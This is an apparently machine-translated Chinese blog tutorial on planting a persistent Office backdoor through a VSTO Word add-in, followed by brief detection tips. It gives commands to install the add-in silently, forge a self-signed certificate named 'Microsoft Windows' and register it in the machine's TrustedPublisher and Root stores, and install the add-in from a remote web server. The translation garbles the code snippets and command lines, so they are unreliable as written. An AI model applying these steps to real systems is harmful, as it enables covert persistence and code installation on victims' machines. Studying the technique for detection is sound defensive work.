带有VSTO的办公室后门

0x00 前言

最近看了一篇文章《VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules》，介绍了利用VSTO实现Office后门的方法。我在之前的文章《Use Office to maintain persistence》和《Office Persistence on x64 operating system》研究过Office的后门。本文将重现这种方法，分析利用思路，分享实用的利用方法，最后介绍如何识别这个后门。

文章地址：

https://bohops . com/2018/01/31/VSTO-the-payload-installer-that-possible-failed-your-application-whitelisting-rules/

0x01 简介

本文将介绍以下内容：

VSTO的编写方法

实用思维

后门检测

0x02 VSTO的编写方法

1、VSTO简介

Visual Studio Tools for Office的全名

用于自定义office应用程序并与Office控件交互。

在集成的Visual Studio安装包中

如下图

2、VSTO开发

本部分是《VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules》的复制品。

(1) 新建工程

C #-Office-Word 2010加载项

如下图

(2) 添加代码

添加对系统的引用。Windows .窗体

添加项目符号框代码：

使用系统。Windows . Forms

MessageBox。显示(' 1 ')；

如下图

(3) 编译

设置相应的。Net版本，编译并生成以下六个文件：

微软。Office.Tools.Common.v4.0.Utilities.dll

微软。office . tools . common . v 4.0 . utilities . XML

WordAddIn2.dll

WordAddIn2.dll.manifest

WordAddIn2.pdb

WordAddIn2.vsto

(4) 安装插件

执行WordAddIn2.vsto

弹出框提示无法验证发布者，如下图。

选择安装

检查控制面板-程序-程序和功能，查找新安装的插件。

#### (5)打开word.exe，自动加载插件。

项目符号框，如下所示

查看Word add-in，可以看到加载项WordAddIn2，如下图所示。

到目前为止，办公室后门的安装已经成功实施。

0x03 实际利用思路

实际使用时，首先需要满足安装过程中没有界面的要求，所以要绕过弹出框提示无法验证发布者，需要做以下改进：

(1) 命令行安装VSTO插件

用VSTOInstaller.exe。

Office安装后，系统包含默认路径% program files % \ common files \ Microsoft shared \ VSTO \ 10.0。

参数描述：

/i:安装

/u:卸载

/s:静默操作。如果您需要信任提示，将不会安装或更新UDF。

安装参数如下：

c:\ Program Files \ Common Files \ Microsoft shared \ VSTO \ 10.0 \ vstoinstaller . exe '/I/s c:\ test \ word addin 2

安装失败，因为信任提示导致无法验证发行者。

(2) 绕过验证发行者

VSTO插件提供签名功能，如下图所示

使用以下工具手动生成一组签名证书

makecert.exe

cert2spc.exe

pvk2pfx.exe

certmgr.exe

Windows SDK，可从以下网址下载：

https://github.com/3gstudent/signtools

生成命令：

makecert-n ' CN=Microsoft Windows '-r-SV root . pvk root . cer

cert2spc Root.cer Root.spc

pvk 2 pfx-pvk root . pvk-pi 12345678 password-SPC root . SPC-pfx root . pfx-f

执行后，会生成四个文件，Root.cer、Root.pfx、Root.pvk和Root.spc。

替换插件WordAddIn2的证书，如下图所示

证书注册(管理员权限):

certmgr.exe-添加Root.cer -c -s -r localMachine可信发布者

certmgr.exe-add-c root . cer-s-r本地计算机根目录

注：

需要将证书添加到TrustedPublisher和root中。

重新安装VSTO插件，就不会被屏蔽了。

(3) 远程安装

VSTOInstaller.exe支持远程安装。

您可以将VSTO插件放在远程Web服务器上。

安装参数如下：

c:\ Program Files \ Common Files \ Microsoft shared \ VSTO \ 10.0 \ vstoinstaller . exe '/s/I http://192 . 168 . 62 . 131/1/word addin 1 . VSTO

综上所述，实际利用过程如下：

生成VSTO插件

向插件添加签名。

证书注册

远程下载和安装

0x04 后门检测

1.检查控制面板-程序-程序和功能中的可疑插件。

注：

VSTO插件不会在卸载注册表的位置创建新的键值(HKEY _本地_机器\软件\微软\ windows \当前版本\卸载\)。

2.检查Office的COM加载项

注：

禁用宏不会阻止VSTO插件的加载。

0x05 小结

本文对用VSTO实现办公室后门的方法进行了测试，并结合实际利用思路对检测方法进行了分析。

留下回复